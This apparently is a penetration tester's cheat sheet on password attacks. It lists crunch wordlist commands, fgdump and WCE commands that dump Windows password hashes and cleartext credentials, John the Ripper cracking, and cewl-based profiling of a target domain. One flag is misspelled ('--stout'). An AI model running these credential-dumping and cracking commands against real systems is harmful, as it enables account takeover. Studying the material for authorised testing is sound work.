man crunch
ls -la /usr/share/crunch/charset.lst
crunch 6 6 0123456789ABCDEF -o list.txt
# Create a file of passwords 6 characters long using 0-F and save it to a file
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha -o mixedalpha.txt
# 4 character passwords using pre-defined crunch list
crunch 8 8 -t ,@@^^%%% |more
# Similar to Abc$#123, Jud()666, Hol&&278 passwords
PWdump/FGdump
You need to have admin access to run those two commands.
fgdump.exe
# Run it. Dumps the hashes to a file to be used and cracked later
type 127.0.0.1.pwdump
# Access the contents of the file generated from fgdump.exe command
WCE (Windows Credential Editor)
Need admin access.
wce64.exe -w
# Run it. Dumps password in clear text
John the Ripper
john hashes.txt
# Run it. Cracks the hash passwords on Kali Linux using dictionary brute-force attack(MAY TAKE LONG)
Password Profiling
Using word/phrases for organisation and include them in our wordlist (e.g 33 Company uses thirtythree password combinations)
Tool: cewl Create passwords from words/phrases
cewl www.domain.com -m 6 -w /root/domain-cel.txt
# Will create a password txt for the domain
In combination with John the Ripper
vi /etc/john/john.conf
(ADD) $[0-9]$[0-9]
john --wordlist=megacorp-cewl.txt --rules --stout > mutated.txt
